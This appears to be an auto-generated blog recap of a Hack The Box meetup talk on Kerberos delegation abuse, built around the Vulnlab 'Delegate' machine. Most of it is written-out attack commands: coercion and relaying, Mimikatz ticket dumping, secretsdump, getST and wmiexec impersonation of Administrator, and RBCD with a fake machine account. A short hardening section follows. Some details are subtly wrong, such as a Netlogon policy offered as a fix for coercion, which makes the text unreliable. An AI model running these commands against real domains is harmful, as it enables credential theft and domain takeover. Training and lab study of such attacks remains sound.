Listen to this Post

Introduction:
The 93rd Hack The Box Meetup in France brought together cybersecurity enthusiasts for an evening of advanced Active Directory exploitation techniques and community-driven learning. The highlight was Tristan Manzano’s deep dive into the “Delegate” machine from Vulnlab, focusing on Kerberos coercion and delegation abuse—a critical attack path for red teamers and a nightmare for blue teams with misconfigured domains. The event also featured a 51-question Kahoot quiz on cybersecurity essentials, rewarding participants with valuable training vouchers, reinforcing the meetup’s mission to make hands-on security education accessible to all.
Learning Objectives:
- Understand how Kerberos delegation and coercion attacks work in a practical AD environment.
- Learn to identify and exploit misconfigured delegation settings using open-source tools.
- Gain hands-on experience with commands and techniques applicable to both penetration testing and defensive hardening.
You Should Know:
1. Deconstructing the “Delegate” Machine: Kerberos Coercion
Tristan Manzano’s presentation centered on the “Delegate” machine, which simulated a common enterprise misconfiguration: unconstrained or constrained delegation. In an Active Directory environment, delegation allows a service to impersonate a user to access other resources. Attackers leverage this by coercing a high-value target (like a Domain Controller or a server with privileged access) to authenticate to a machine they control. This is often done using the MS-RPC or SMB protocols via tools like `SpoolSample` (the Printer Bug) or PetitPotam. Once the target authenticates, the attacker can capture or relay the ticket.
For a step-by-step approach to testing this, start with an Nmap scan to identify domain controllers and servers with open SMB or RPC ports.
Linux - Identify potential targets nmap -p 445,139,135 --script smb-os-discovery <target_ip_range>
From a Windows attack machine, you can use Rubeus to monitor for incoming tickets while coercing a target.
Windows (as administrator) - Monitor for TGTs Rubeus.exe monitor /interval:1 /filteruser:target_user
Then, use a coercion tool like SpoolSample to force the target to authenticate to your machine.
Linux - Using Impacket's ntlmrelayx or coercion scripts sudo python3 ./ntlmrelayx.py -t smb://<target_ip> -smb2support In another terminal, trigger the coercion python3 ./dementor.py <attacker_ip> <target_ip>
2. Exploiting Unconstrained Delegation
Unconstrained delegation is the most dangerous form. If a server has this property set, any user authenticating to it sends their forwardable TGT (Ticket-Granting Ticket) to the server, which stores it in memory. An attacker who compromises such a server can dump all TGTs passing through it. To check for machines with unconstrained delegation, query Active Directory using PowerView or LDAP.
Windows - PowerView Get-NetComputer -Unconstrained -Domain <domain_name>
If you have compromised a server with unconstrained delegation, use Mimikatz to extract TGTs from memory.
Windows - Mimikatz (run as SYSTEM) privilege::debug sekurlsa::tickets /export
The extracted tickets (.kirbi files) can be used for pass-the-ticket attacks. To use a ticket on Linux with Impacket:
Linux - Convert and use the ticket export KRB5CCNAME=/path/to/ticket.ccache python3 ./secretsdump.py -k -no-pass <target_domain>/<any_user>@<target_machine>
3. Abusing Constrained Delegation (S4U2Proxy)
Constrained delegation is more restrictive but still exploitable. It allows a service to impersonate users only to specific services. The attack requires compromising an account that has “msDS-AllowedToDelegateTo” set. With the service’s password hash or AES key, you can forge a ticket for any user to access the allowed service. This uses the S4U2Self and S4U2Proxy extensions.
First, identify accounts with constrained delegation.
Windows - PowerView Get-DomainUser -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto
If you have the hash of the service account, use Impacket’s `getST.py` to request a ticket for a domain admin to the target service.
Linux - Request a ticket for Administrator to the CIFS service on the DC python3 ./getST.py -spn cifs/dc.domain.local -impersonate administrator -hashes :<nt_hash> domain.local/<delegated_account> export KRB5CCNAME=administrator.ccache Access the DC using the ticket python3 ./wmiexec.py -k -no-pass domain.local/[email protected]
4. Resource-Based Constrained Delegation (RBCD)
RBCD is a modern delegation model where the resource (e.g., a server) decides who can delegate to it. If you have write permissions on a computer object’s `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute, you can compromise that machine. This often involves setting up a new computer account (if the `MachineAccountQuota` is > 0) and configuring RBCD.
Using PowerMad and Rubeus on Windows:
Create a new machine account (default quota is 10) New-MachineAccount -MachineAccount "FakeComputer" -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force) Get the SID of the new account Get-DomainComputer FakeComputer -Properties objectsid Set RBCD for the target computer (requires DA or specific rights) Set-DomainRBCD -TargetIdentity "TargetComputer" -DelegateFrom "FakeComputer"
Then, request a ticket from the fake computer to the target service:
Rubeus.exe s4u /user:FakeComputer$ /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt
5. Defensive Measures: Hardening Against Delegation Attacks
From a blue team perspective, detection and prevention are key. Monitor for Event ID 4769 (A Kerberos service ticket was requested) with unusual service names or encryption types. Also, look for Event ID 4742 for changes to delegation attributes.
Hardening steps include:
- Setting `msDS-AllowedToDelegateTo` to the bare minimum.
- Disabling unconstrained delegation entirely where possible.
- Enabling “Protected Users” group or setting “Account is sensitive and cannot be delegated” for high-value accounts.
- Using Group Policy to set `Security Options: Domain controller: Allow vulnerable Netlogon` to disabled (addressing Coercion vectors).
To check for dangerous delegation settings from a Linux perspective using LDAP:
Query for unconstrained delegation ldapsearch -x -H ldap://dc.domain.local -D '[email protected]' -W -b "DC=domain,DC=local" "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn
- The CTF and Learning Path: From Meetup to Pro Labs
The meetup emphasized that understanding these attacks is not just for CTFs. The distribution of vouchers for Hack The Box Academy and Pro Labs underscores the importance of structured learning. For someone starting, the path involves mastering Linux/Windows fundamentals, then moving to active directory modules. A typical lab setup for practicing these attacks locally involves creating a Domain Controller and a member server with delegation configured.
Using VirtualBox, set up a Windows Server 2019 as a DC and a Windows 10/Server as a member. Install and configure Active Directory, then set delegation on the member server using `Active Directory Users and Computers` > Properties > Delegation tab. This replicates the “Delegate” box environment locally for safe practice.
What Undercode Say:
- Key Takeaway 1: Kerberos delegation attacks are a primary method for lateral movement and privilege escalation in Active Directory. Understanding the mechanics of coercion, S4U2Self, and S4U2Proxy is essential for both red and blue teams.
- Key Takeaway 2: Community events like the HTB France meetup are critical for translating theoretical knowledge into practical skills. The combination of live walkthroughs, interactive quizzes, and free lab access accelerates the learning curve far beyond self-study.
The presentation by Tristan Manzano and the interactive Kahoot session exemplify how the cybersecurity community drives collective knowledge forward. The emphasis on hands-on practice, whether through Vulnlab boxes or HTB Pro Labs, is the most effective way to internalize complex attack chains. The generous distribution of VIP+ and Academy vouchers ensures that financial barriers don’t prevent talented individuals from advancing their skills, directly contributing to a stronger, more diverse security workforce. As Active Directory remains the backbone of most corporate networks, mastering these attacks is not optional—it is a necessity.
Prediction:
The future of offensive security training will see a greater integration of “forensic on Active Directory” as a standard follow-up to exploitation demos. As attacks become more sophisticated, defensive strategies will pivot towards proactive deception and automated detection of delegation anomalies, using machine learning to baseline normal Kerberos behavior. Expect to see more open-source tools that combine coercion, delegation abuse, and logging in a single framework, mirroring the holistic approach seen in modern C2 frameworks.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Matthieubillaux Hackthebox – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


